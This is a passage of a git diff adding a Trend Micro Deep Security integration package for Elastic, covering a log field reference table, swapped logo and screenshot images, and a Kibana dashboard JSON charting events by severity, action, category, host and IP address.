trendmicro.deep_security.trendmicro.ds_file.md5 | The MD5 hash of the file. | keyword | +| trendmicro.deep_security.trendmicro.ds_file.sha1 | The SHA1 hash of the file. | keyword | +| trendmicro.deep_security.trendmicro.ds_file.sha256 | The SHA256 hash of the file. | keyword | +| trendmicro.deep_security.trendmicro.ds_frame_type | Connection ethernet frame type. | keyword | +| trendmicro.deep_security.trendmicro.ds_malware_target.count | The number of target files. | long | +| trendmicro.deep_security.trendmicro.ds_malware_target.type | The type of system resource that this malware was trying to affect. | keyword | +| trendmicro.deep_security.trendmicro.ds_malware_target.value | The file, process, or registry key (if any) that the malware was trying to affect. | keyword | +| trendmicro.deep_security.trendmicro.ds_mitre | The MITRE information, if the process behavior is identified in one of MITRE attack scenarios. | keyword | +| trendmicro.deep_security.trendmicro.ds_packet_data | The packet data, represented in Base64. | keyword | +| trendmicro.deep_security.trendmicro.ds_process | Name of ds process. | keyword | +| trendmicro.deep_security.trendmicro.ds_relevant_detection_names | Probable Threat Type. | keyword | +| trendmicro.deep_security.trendmicro.ds_tenant | Deep Security tenant. | keyword | +| trendmicro.deep_security.trendmicro.ds_tenant_id | Deep Security tenant ID. | keyword | +| trendmicro.deep_security.type | The device type of the device. | keyword | +| trendmicro.deep_security.version | Deep Security version. | keyword | +| trendmicro.deep_security.xff | The IP address of the last hub in the X-Forwarded-For header. | ip | diff --git a/packages/trendmicro/img/Trend-Micro-Logo.svg b/packages/trendmicro/img/Trend-Micro-Logo.svg deleted file mode 100644 index a20e1dad4a6..00000000000 --- a/packages/trendmicro/img/Trend-Micro-Logo.svg +++ /dev/null @@ -1,147 +0,0 @@ - - - - - - - image/svg+xml - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - diff --git a/packages/trendmicro/img/sample-logo.svg b/packages/trendmicro/img/sample-logo.svg deleted file mode 100644 index 6268dd88f3b..00000000000 --- a/packages/trendmicro/img/sample-logo.svg +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/packages/trendmicro/img/sample-screenshot.png b/packages/trendmicro/img/sample-screenshot.png deleted file mode 100644 index d7a56a3ecc0..00000000000 Binary files a/packages/trendmicro/img/sample-screenshot.png and /dev/null differ diff --git a/packages/trendmicro/img/trend-micro-deep-security-dashboard-screenshot.png b/packages/trendmicro/img/trend-micro-deep-security-dashboard-screenshot.png deleted file mode 100644 index 8550129b29d..00000000000 Binary files a/packages/trendmicro/img/trend-micro-deep-security-dashboard-screenshot.png and /dev/null differ diff --git a/packages/trendmicro/img/trend-micro-logo.svg b/packages/trendmicro/img/trend-micro-logo.svg new file mode 100644 index 00000000000..70a04e98eca --- /dev/null +++ b/packages/trendmicro/img/trend-micro-logo.svg @@ -0,0 +1,9 @@ + + + + + + + + + diff --git a/packages/trendmicro/img/trendmicro-deep_security-dashboard.png b/packages/trendmicro/img/trendmicro-deep_security-dashboard.png new file mode 100644 index 00000000000..ce23a748693 Binary files /dev/null and b/packages/trendmicro/img/trendmicro-deep_security-dashboard.png differ diff --git a/packages/trendmicro/kibana/dashboard/trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d.json b/packages/trendmicro/kibana/dashboard/trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d.json new file mode 100644 index 00000000000..dabc6df903d --- /dev/null +++ b/packages/trendmicro/kibana/dashboard/trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d.json @@ -0,0 +1,1190 @@ +{ + "attributes": { + "controlGroupInput": { + "chainingSystem": "HIERARCHICAL", + "controlStyle": "oneLine", + "ignoreParentSettingsJSON": "{\"ignoreFilters\":false,\"ignoreQuery\":false,\"ignoreTimerange\":false,\"ignoreValidations\":false}", + "panelsJSON": "{\"5c39feda-a37e-412b-b289-bfe4b7431187\":{\"type\":\"rangeSliderControl\",\"order\":0,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"5c39feda-a37e-412b-b289-bfe4b7431187\",\"fieldName\":\"event.severity\",\"title\":\"Event Severity\",\"grow\":true,\"width\":\"medium\",\"enhancements\":{}}},\"741c9ea5-a76e-4689-813a-575608fba5b0\":{\"type\":\"optionsListControl\",\"order\":1,\"grow\":true,\"width\":\"medium\",\"explicitInput\":{\"id\":\"741c9ea5-a76e-4689-813a-575608fba5b0\",\"fieldName\":\"trendmicro.deep_security.event_category\",\"title\":\"Event Category\",\"grow\":true,\"width\":\"medium\",\"selectedOptions\":[],\"enhancements\":{}}}}" + }, + "description": "Overview of the Trend Micro Deep Security Logs.", + "kibanaSavedObjectMeta": { + "searchSourceJSON": { + "filter": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "field": "data_stream.dataset", + "indexRefName": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "key": "data_stream.dataset", + "negate": false, + "params": { + "query": "trendmicro.deep_security" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "data_stream.dataset": "trendmicro.deep_security" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "optionsJSON": { + "hidePanelTitles": false, + "syncColors": false, + "syncCursor": true, + "syncTooltips": false, + "useMargins": true + }, + "panelsJSON": [ + { + "embeddableConfig": { + "enhancements": {}, + "hidePanelTitles": false, + "savedVis": { + "data": { + "aggs": [], + "searchSource": { + "filter": [], + "query": { + "language": "kuery", + "query": "" + } + } + }, + "description": "", + "id": "", + "params": { + "fontSize": 12, + "markdown": "Navigation\n\n[Trend Micro Deep Security (This Page)](#/dashboard/trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d)\n\n[Integration Page](/app/integrations/detail/trendmicro-1.9.0/overview)\n\nOverview\n\nThis dashboard shows the deep security overview related to the Trend Micro Integration.\n\nThis dashboard is made to provide general statistics and show the detection of various ingested events.\n\nIt provides information about the event by action and and distribution of events by the severity. It also displays event over hostname and host ID. It displays top source IPs and top destination IPs seen on the event. Furthermore, it also shows the distribution of events by category and event code.\n", + "openLinksInNewTab": false + }, + "title": "", + "type": "markdown", + "uiState": {} + } + }, + "gridData": { + "h": 20, + "i": "0a669a02-0faf-47fc-ac73-fdb78aa9fff8", + "w": 13, + "x": 0, + "y": 0 + }, + "panelIndex": "0a669a02-0faf-47fc-ac73-fdb78aa9fff8", + "title": "Table of Contents", + "type": "visualization" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-530d0aff-656d-449a-a077-460145061b6f", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "530d0aff-656d-449a-a077-460145061b6f": { + "columnOrder": [ + "1b35bee8-d015-4d9d-b531-13405efb426f", + "7aa88764-249a-46b3-b9cc-f0cb802a8742" + ], + "columns": { + "1b35bee8-d015-4d9d-b531-13405efb426f": { + "customLabel": true, + "dataType": "number", + "isBucketed": true, + "label": "Event Severity", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "7aa88764-249a-46b3-b9cc-f0cb802a8742", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "event.severity" + }, + "7aa88764-249a-46b3-b9cc-f0cb802a8742": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "530d0aff-656d-449a-a077-460145061b6f", + "layerType": "data", + "legendDisplay": "show", + "metrics": [ + "7aa88764-249a-46b3-b9cc-f0cb802a8742" + ], + "nestedLegend": false, + "numberDisplay": "percent", + "primaryGroups": [ + "1b35bee8-d015-4d9d-b531-13405efb426f" + ], + "truncateLegend": false + } + ], + "shape": "pie" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 20, + "i": "b3a67122-6a81-4be6-8b62-4526105b4cce", + "w": 14, + "x": 13, + "y": 0 + }, + "panelIndex": "b3a67122-6a81-4be6-8b62-4526105b4cce", + "title": "Event by Severity [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-83a268fd-8f89-4e7c-8e6a-bc789f616a8d", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "83a268fd-8f89-4e7c-8e6a-bc789f616a8d": { + "columnOrder": [ + "be7e6dab-cfd1-4a11-ac2a-8c414127f28b", + "a2b358f2-8602-49c7-8395-812b9dbd0ebc" + ], + "columns": { + "a2b358f2-8602-49c7-8395-812b9dbd0ebc": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "be7e6dab-cfd1-4a11-ac2a-8c414127f28b": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Action", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "a2b358f2-8602-49c7-8395-812b9dbd0ebc", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.action" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "a2b358f2-8602-49c7-8395-812b9dbd0ebc" + ], + "layerId": "83a268fd-8f89-4e7c-8e6a-bc789f616a8d", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "be7e6dab-cfd1-4a11-ac2a-8c414127f28b" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 20, + "i": "02556512-72e7-43ce-ad71-3cd710d450d0", + "w": 21, + "x": 27, + "y": 0 + }, + "panelIndex": "02556512-72e7-43ce-ad71-3cd710d450d0", + "title": "Event by Action [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-88a7d45f-887d-4f85-981a-25b55dd4066c", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "88a7d45f-887d-4f85-981a-25b55dd4066c": { + "columnOrder": [ + "31abb36d-9e7e-41de-9ecb-e99d0e972da4", + "e332307a-0e05-4cf6-94ad-a221430cbe48" + ], + "columns": { + "31abb36d-9e7e-41de-9ecb-e99d0e972da4": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Category", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "e332307a-0e05-4cf6-94ad-a221430cbe48", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "trendmicro.deep_security.event_category" + }, + "e332307a-0e05-4cf6-94ad-a221430cbe48": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "e332307a-0e05-4cf6-94ad-a221430cbe48" + ], + "layerId": "88a7d45f-887d-4f85-981a-25b55dd4066c", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "31abb36d-9e7e-41de-9ecb-e99d0e972da4" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 14, + "i": "9d474498-b09f-4428-94b2-7b15236bdcc8", + "w": 48, + "x": 0, + "y": 20 + }, + "panelIndex": "9d474498-b09f-4428-94b2-7b15236bdcc8", + "title": "Event by Category [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-03032b54-be30-4726-918b-2b08b8404765", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "03032b54-be30-4726-918b-2b08b8404765": { + "columnOrder": [ + "bd2637f1-237c-4e2f-b961-2f7cdd62e9f1", + "83ea58b5-015e-4741-bd7d-dd3af966f462" + ], + "columns": { + "83ea58b5-015e-4741-bd7d-dd3af966f462": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "bd2637f1-237c-4e2f-b961-2f7cdd62e9f1": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Hostname", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "83ea58b5-015e-4741-bd7d-dd3af966f462", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "observer.hostname" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "83ea58b5-015e-4741-bd7d-dd3af966f462" + ], + "layerId": "03032b54-be30-4726-918b-2b08b8404765", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "bd2637f1-237c-4e2f-b961-2f7cdd62e9f1" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "0f5b2a5d-3fda-49c0-ba2a-eed13f24ae99", + "w": 24, + "x": 0, + "y": 34 + }, + "panelIndex": "0f5b2a5d-3fda-49c0-ba2a-eed13f24ae99", + "title": "Event over Hostname [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-ae80824c-c802-4c33-a471-b2d45078e03a", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "currentIndexPatternId": "logs-*", + "layers": { + "ae80824c-c802-4c33-a471-b2d45078e03a": { + "columnOrder": [ + "8bba50e9-6def-48cf-9308-bb9fd3b9e6fb", + "70fe81ad-df26-44e3-a31e-cd3559e642e2" + ], + "columns": { + "70fe81ad-df26-44e3-a31e-cd3559e642e2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "8bba50e9-6def-48cf-9308-bb9fd3b9e6fb": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Host ID", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "70fe81ad-df26-44e3-a31e-cd3559e642e2", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "secondaryFields": [], + "size": 10 + }, + "scale": "ordinal", + "sourceField": "host.id" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "indexPatternId": "logs-*", + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "70fe81ad-df26-44e3-a31e-cd3559e642e2" + ], + "layerId": "ae80824c-c802-4c33-a471-b2d45078e03a", + "layerType": "data", + "position": "top", + "seriesType": "bar_stacked", + "showGridlines": false, + "xAccessor": "8bba50e9-6def-48cf-9308-bb9fd3b9e6fb" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_stacked", + "title": "Empty XY chart", + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "9a0ec7f7-016e-402c-a3c3-8aed4c8d0d6c", + "w": 24, + "x": 24, + "y": 34 + }, + "panelIndex": "9a0ec7f7-016e-402c-a3c3-8aed4c8d0d6c", + "title": "Event over Host ID [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-c1ecdea5-0c0f-4fed-b82d-5b36b3889511", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "c1ecdea5-0c0f-4fed-b82d-5b36b3889511": { + "columnOrder": [ + "f150c670-4eb5-4401-b3e5-e8dc4cc3df9c", + "1dab2338-b858-4296-b556-425eea4754e1" + ], + "columns": { + "1dab2338-b858-4296-b556-425eea4754e1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "f150c670-4eb5-4401-b3e5-e8dc4cc3df9c": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Event Code", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "1dab2338-b858-4296-b556-425eea4754e1", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": true, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "event.code" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 + }, + "layers": [ + { + "accessors": [ + "1dab2338-b858-4296-b556-425eea4754e1" + ], + "layerId": "c1ecdea5-0c0f-4fed-b82d-5b36b3889511", + "layerType": "data", + "position": "top", + "seriesType": "bar_horizontal_stacked", + "showGridlines": false, + "xAccessor": "f150c670-4eb5-4401-b3e5-e8dc4cc3df9c" + } + ], + "legend": { + "isVisible": true, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": true + }, + "preferredSeriesType": "bar_horizontal_stacked", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 16, + "i": "93dd4f88-7776-471d-97c4-171b5dd83d37", + "w": 48, + "x": 0, + "y": 49 + }, + "panelIndex": "93dd4f88-7776-471d-97c4-171b5dd83d37", + "title": "Event by Code [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-5f3b1845-4299-4863-bcb7-5de7e2c1ad22", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "5f3b1845-4299-4863-bcb7-5de7e2c1ad22": { + "columnOrder": [ + "67dbe9ab-f18e-4bc9-a103-c95629926a88", + "ff8ea686-753d-4f48-bf90-9d03757eb27c" + ], + "columns": { + "67dbe9ab-f18e-4bc9-a103-c95629926a88": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Destination IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "ff8ea686-753d-4f48-bf90-9d03757eb27c", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "destination.ip" + }, + "ff8ea686-753d-4f48-bf90-9d03757eb27c": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "67dbe9ab-f18e-4bc9-a103-c95629926a88", + "isTransposed": false + }, + { + "columnId": "ff8ea686-753d-4f48-bf90-9d03757eb27c", + "isTransposed": false + } + ], + "layerId": "5f3b1845-4299-4863-bcb7-5de7e2c1ad22", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "b62308e5-e9cc-423b-802a-5346bec4a83a", + "w": 24, + "x": 0, + "y": 65 + }, + "panelIndex": "b62308e5-e9cc-423b-802a-5346bec4a83a", + "title": "Top Destination IP Addresses [Logs Trend Micro]", + "type": "lens" + }, + { + "embeddableConfig": { + "attributes": { + "description": "", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-04346474-aa93-46d7-99f1-5bcf54e01bc8", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "04346474-aa93-46d7-99f1-5bcf54e01bc8": { + "columnOrder": [ + "a2c3e2fb-06bf-4817-ab4f-ebc6a3569d75", + "9bb49132-3c1b-4d3a-8253-9db49ae0bc69" + ], + "columns": { + "9bb49132-3c1b-4d3a-8253-9db49ae0bc69": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Count", + "operationType": "count", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "a2c3e2fb-06bf-4817-ab4f-ebc6a3569d75": { + "customLabel": true, + "dataType": "ip", + "isBucketed": true, + "label": "Source IP", + "operationType": "terms", + "params": { + "exclude": [], + "excludeIsRegex": false, + "include": [], + "includeIsRegex": false, + "missingBucket": false, + "orderBy": { + "columnId": "9bb49132-3c1b-4d3a-8253-9db49ae0bc69", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 10 + }, + "scale": "ordinal", + "sourceField": "source.ip" + } + }, + "ignoreGlobalFilters": false, + "incompleteColumns": {}, + "sampling": 1 + } + } + }, + "indexpattern": { + "layers": {} + }, + "textBased": { + "layers": {} + } + }, + "filters": [], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "a2c3e2fb-06bf-4817-ab4f-ebc6a3569d75", + "isTransposed": false + }, + { + "columnId": "9bb49132-3c1b-4d3a-8253-9db49ae0bc69", + "isTransposed": false + } + ], + "layerId": "04346474-aa93-46d7-99f1-5bcf54e01bc8", + "layerType": "data" + } + }, + "title": "", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false + }, + "gridData": { + "h": 15, + "i": "34396378-6eb7-4756-ad5f-828bcbe84787", + "w": 24, + "x": 24, + "y": 65 + }, + "panelIndex": "34396378-6eb7-4756-ad5f-828bcbe84787", + "title": "Top Source IP Addresses [Logs Trend Micro]", + "type": "lens" + } + ], + "timeRestore": false, + "title": "[Logs Trend Micro] Deep Security", + "version": 1 + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-07T06:48:54.569Z", + "id": "trendmicro-5036f0c0-c1c5-11ee-9590-81e76a30321d", + "managed": false, + "references": [ + { + "id": "logs-*", + "name": "kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b3a67122-6a81-4be6-8b62-4526105b4cce:indexpattern-datasource-layer-530d0aff-656d-449a-a077-460145061b6f", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "02556512-72e7-43ce-ad71-3cd710d450d0:indexpattern-datasource-layer-83a268fd-8f89-4e7c-8e6a-bc789f616a8d", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9d474498-b09f-4428-94b2-7b15236bdcc8:indexpattern-datasource-layer-88a7d45f-887d-4f85-981a-25b55dd4066c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "0f5b2a5d-3fda-49c0-ba2a-eed13f24ae99:indexpattern-datasource-layer-03032b54-be30-4726-918b-2b08b8404765", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "9a0ec7f7-016e-402c-a3c3-8aed4c8d0d6c:indexpattern-datasource-layer-ae80824c-c802-4c33-a471-b2d45078e03a", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "93dd4f88-7776-471d-97c4-171b5dd83d37:indexpattern-datasource-layer-c1ecdea5-0c0f-4fed-b82d-5b36b3889511", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b62308e5-e9cc-423b-802a-5346bec4a83a:indexpattern-datasource-layer-5f3b1845-4299-4863-bcb7-5de7e2c1ad22", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "34396378-6eb7-4756-ad5f-828bcbe84787:indexpattern-datasource-layer-04346474-aa93-46d7-99f1-5bcf54e01bc8", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_5c39feda-a37e-412b-b289-bfe4b7431187:rangeSliderDataView", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "controlGroup_741c9ea5-a76e-4689-813a-575608fba5b0:optionsListDataView", + "type": "index-pattern" + }, + { + "id": "trendmicro-security-solution-default", + "name": "tag-ref-trendmicro-security-solution-default", + "type": "tag" + }, + { + "id": "trendmicro-security-solution-default", + "name": "tag-ref-security-solution-default", + "type": "tag" + } + ], + "type": "dashboard", + "typeMigrationVersion": "8.9.0" +} \ No newline at end of file diff --git a/packages/trendmicro/kibana/tag/trendmicro-security-solution-default.json b/packages/trendmicro/kibana/tag/trendmicro-security-solution-default.json new file mode 100644 index 00000000000..1ea0d06a310 --- /dev/null +++ b/packages/trendmicro/kibana/tag/trendmicro-security-solution-default.json @@ -0,0 +1,14 @@ +{ + "attributes": { + "color": "#9696F1", + "description": "Tag defined in package-spec", + "name": "Security Solution" + }, + "coreMigrationVersion": "8.8.0", + "created_at": "2024-02-06T09:32:11.830Z", + "id": "trendmicro-security-solution-default", + "managed": false, + "references": [], + "type": "tag", + "typeMigrationVersion": "8.0.0" +} \ No newline at end of file diff --git a/packages/trendmicro/manifest.yml b/packages/trendmicro/manifest.yml index 8c4594a638e..7ee4aef99cc 100644 